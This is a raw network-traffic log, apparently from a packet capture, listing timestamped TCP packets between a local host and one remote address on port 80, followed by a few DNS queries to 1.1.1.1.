                        Dec 29, 2024 16:51:04.261190891 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261235952 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261270046 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261279106 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261320114 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261322021 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261364937 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261405945 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261451960 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261455059 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261502028 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261519909 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261568069 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.261652946 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261732101 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261739969 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261847973 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.261894941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262064934 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262105942 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262244940 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262269020 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262373924 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262427092 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262562990 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.262619972 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262666941 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.262672901 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262681961 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262725115 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.262785912 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262826920 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.262844086 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262892008 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.262957096 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.262998104 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.278017044 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.278122902 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.319989920 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.320215940 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.381990910 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382035017 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.382074118 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382126093 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.382186890 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382234097 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382236004 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.382323027 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382438898 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382556915 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382648945 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382656097 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382699013 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382813931 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382821083 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382855892 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382935047 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.382999897 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383114100 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383121967 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383414030 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383513927 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383548975 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383569956 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383590937 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383691072 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383698940 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383734941 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383742094 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383744955 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383749008 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383794069 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383871078 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383881092 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383919954 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.383944035 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.383985996 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.384008884 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384016991 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384047985 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384059906 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.384104013 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.384131908 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384140015 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384171963 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.384202003 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384243011 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384299994 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384340048 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384407997 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384418964 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384526968 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384538889 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384721994 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384731054 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384792089 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384840965 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384897947 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.384907007 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385010004 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385016918 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385027885 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385063887 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385103941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385153055 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385204077 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385211945 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385258913 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385270119 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385376930 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385385990 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385471106 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385478020 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.385514975 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.398930073 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.399195910 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.441149950 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.503768921 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.503844976 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.503854036 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.503951073 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.503958941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.504007101 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.504055023 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.504353046 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.504440069 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.505253077 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505311012 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505460024 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505469084 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505508900 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505573034 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505583048 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505616903 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505739927 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505748987 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505856037 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505865097 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505875111 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505916119 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.505996943 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506009102 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506063938 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506130934 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506251097 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506259918 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506289959 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506347895 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506377935 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506465912 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506477118 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506494045 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506589890 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506598949 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506648064 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506656885 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506756067 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506763935 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506860971 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506870031 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506916046 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.506988049 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507050037 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507059097 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507196903 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507242918 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507273912 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507349968 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507359028 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507492065 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507502079 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507509947 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507555008 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507564068 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507577896 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507586002 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507653952 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507663965 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507673025 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.507761002 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.508033037 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.508096933 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.625489950 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625499964 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625505924 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625549078 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625633955 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625641108 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625677109 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625693083 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625808001 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625823975 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625861883 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625926971 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.625965118 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626013041 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626070023 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626151085 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626157999 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626166105 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626352072 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626368046 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626451015 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626533031 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626576900 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626591921 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626635075 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626702070 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626740932 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626832962 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626842022 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626909971 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626986027 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.626992941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627002954 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627028942 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627120972 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627129078 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627212048 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627247095 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627346039 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627355099 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627392054 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627433062 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627489090 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627505064 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627574921 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627583027 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627650976 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627696037 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627751112 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627873898 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627885103 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627928972 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.627979994 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.628041029 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.628263950 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:04.628947020 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.628956079 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629075050 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629082918 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629115105 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629122019 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629175901 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629224062 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629271030 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629278898 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629334927 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629436970 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629451990 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629460096 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629586935 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629594088 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629627943 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629642010 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629770041 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629777908 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629837036 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629844904 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629954100 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.629961014 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630014896 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630022049 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630072117 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630156994 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630165100 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630199909 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630217075 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630295992 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630317926 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630381107 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630389929 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630456924 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630472898 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630551100 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630568027 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630677938 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630686045 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630718946 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630789995 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630845070 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630913973 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630953074 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.630960941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631036043 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631043911 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631124020 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631135941 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631263971 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631272078 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.631278992 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749202967 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749219894 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749254942 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749269962 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749279976 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749365091 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749375105 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749433994 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749450922 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749494076 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749521017 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749538898 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749628067 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749635935 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749686956 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749702930 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749826908 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749869108 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749876022 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749878883 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749938965 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.749947071 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750011921 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750031948 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750083923 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750099897 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750138044 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750206947 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750258923 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750380993 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750396967 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750405073 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:04.750413895 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:09.486716986 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:09.486911058 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:09.487067938 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:09.487967968 CET4973180192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:09.608818054 CET8049731193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:09.781728029 CET4973280192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:09.902753115 CET8049732193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:09.902826071 CET4973280192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:09.906896114 CET4973280192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:10.027760983 CET8049732193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:11.498604059 CET8049732193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:11.498740911 CET8049732193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:11.498796940 CET4973280192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:11.499095917 CET4973280192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:11.619853973 CET8049732193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:11.646800041 CET4973380192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:11.767827034 CET8049733193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:11.767945051 CET4973380192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:11.771110058 CET4973380192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:11.891959906 CET8049733193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:13.545677900 CET8049733193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:13.545710087 CET8049733193.233.84.212192.168.2.4
                        Dec 29, 2024 16:51:13.545778990 CET4973380192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:13.545936108 CET4973380192.168.2.4193.233.84.212
                        Dec 29, 2024 16:51:13.666872978 CET8049733193.233.84.212192.168.2.4
                        TimestampSource PortDest PortSource IPDest IP
                        Dec 29, 2024 16:50:58.657742023 CET5900953192.168.2.41.1.1.1
                        Dec 29, 2024 16:50:58.657793045 CET5900953192.168.2.41.1.1.1
                        Dec 29, 2024 16:50:58.798562050 CET53590091.1.1.1192.168.2.4
                        Dec 29, 2024 16:50:58.949301004 CET53590091.1.1.1192.168.2.4
                        Dec 29, 2024 16:51:02.032633066 CET5901253192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:02.032788038 CET5901253192.168.2.41.1.1.1
                        Dec 29, 2024 16:51:02.887988091 CET53590121.1.1.1192.168.2.4
